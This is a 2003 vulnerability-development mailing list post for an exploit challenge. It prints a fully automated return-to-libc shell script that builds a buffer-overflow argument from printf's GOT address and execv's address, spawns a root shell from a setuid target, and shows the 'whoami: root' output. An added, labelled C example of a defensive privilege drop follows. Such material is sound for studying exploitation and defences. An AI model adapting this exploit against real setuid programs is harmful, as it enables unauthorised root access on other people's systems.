Vulnerability Development mailing list archives

Re: [Vuln-dev Challenge] Challenge #2 (return-to-libc)


From: Joel Eriksson <je-vulndev () bitnux com>
Date: Sun, 25 May 2003 09:16:04 +0200

Spacewalker and others who did a return-to-libc sploit for vulndev-2.
Returning to system() means your command will be executed like this:

   /bin/sh -c blabla

In Linux, /bin/sh is a symlink to bash. Recent versions of bash reset
the EUID to the real UID. Many other shells also reset the EUID, since
it's pretty common to execute /bin/sh in sploits (that's why shellcodes
usually include a setuid-call before the exec, you know).

Jon Erickson AKA Jose Ronnick exploited it "for real" though, and here's
yet another working return-to-libc exploit, which uses a different approach.
As usual, the sploit is fully automated.

[je@vudo ~]$ cat expldev-2.sh
#!/bin/sh
#
# Linux/x86 exploit for vulndev-2. Version 2 (return-to-libc).
# 
# 2003-05-25 - Joel Eriksson (je at 0xbadc0ded.org)
# 

[ $# -ge 1 ] && vul=$1 || vul=./vulndev-2 ; shift

cat > expldev-2.c << EOF
#include <unistd.h>
#include <errno.h>
int main(void)
{
        setreuid(0, 0);
        execl("/bin/sh", "sh", NULL);
        perror("exec");
        return 1;
}
EOF
gcc -o '%s
' expldev-2.c

buf_size=90     # size of buffer
pad_size=2      # align to word boundary
num_reps=32     # &bfp - &buf may be > BFSIZE (padding/alignment)

cp $vul $vul.tmp # Can't trace a SUID-binary, so use a temporary file.
cat > expldev-2.gdb << EOF
file $vul.tmp
b main
r
p/x &execv
q
EOF
addr_printf=0x$(objdump -R $vul | awk '$3 == "printf" { print $1 }')
addr_execv=$(gdb -q -x expldev-2.gdb | sed -n '$,$s/.* = //p')
rm -f expldev-2.gdb $vul.tmp

perl -e 'print "\0\0\0\0" . pack("L", '$[addr_execv]')' > db.log

arg1=$(perl -e '
        print "A" x ('$[buf_size + pad_size]') .
        pack("L", '$[addr_printf - 4]') x '$num_reps
)

$vul $arg1 ""
[je@vudo ~]$ ./expldev-2.sh
sh-2.05b# whoami
root
sh-2.05b# exit
exit
[je@vudo ~]$

-- 
Joel Eriksson
-------------------------------------------------
Cellphone: +46-70-288 64 16 Home: +46-26-10 23 37
Security Research & Systems Development at Bitnux
PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1
A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1
-------------------------------------------------
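The message above notes that recent bash versions reset the effective UID to the real UID when the two differ, which is what defeats a plain return-to-system() against a setuid target. The following is an added example, not code from the original post or from bash itself: a small C routine showing the defensive pattern bash applies, a permanent drop of effective and saved UIDs to the real UID, followed by a check that the old effective UID cannot be regained. The function name drop_to_real_uid and the return codes are this example's own choices.

```c
/* Added example (not from the original post): the privilege reset the
 * message describes bash performing. If the effective UID differs from
 * the real UID, drop effective and saved UIDs to the real UID so the
 * process cannot switch back later, then verify the drop took effect.
 * Illustrative code; this is not the bash source. */
#define _GNU_SOURCE   /* setresuid() is a GNU/Linux extension */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/* Drop real, effective and saved UIDs to the real UID.
 * Returns 0 on success, -1 if the drop itself failed, -2 if the old
 * effective UID could still be regained afterwards (incomplete drop). */
int drop_to_real_uid(void)
{
    uid_t ruid = getuid();
    uid_t euid = geteuid();

    /* Setting all three IDs to the current real UID is always permitted,
     * so this works both for a setuid process and for a plain one. */
    if (setresuid(ruid, ruid, ruid) != 0)
        return -1;

    if (geteuid() != ruid)
        return -1;

    /* Only meaningful when we actually started with elevated privileges:
     * trying to switch back to the old effective UID must now fail,
     * because the saved UID no longer holds it. */
    if (euid != ruid && seteuid(euid) == 0)
        return -2;

    return 0;
}

/* Stand-alone demonstration: report the IDs before and after the drop. */
int main(void)
{
    printf("before: uid=%u euid=%u\n", (unsigned)getuid(), (unsigned)geteuid());
    int rc = drop_to_real_uid();
    printf("after:  uid=%u euid=%u drop=%d\n", (unsigned)getuid(), (unsigned)geteuid(), rc);
    return rc == 0 ? 0 : 1;
}
```

Run as an unprivileged user the drop is a no-op and succeeds; installed as a setuid binary it lands back at the invoking user's UID, which is the behaviour the message attributes to /bin/sh on Linux. The seteuid() re-check is the part that distinguishes a permanent drop from a temporary one: with setuid() or seteuid() alone, the saved UID would still allow the privileged ID to be restored.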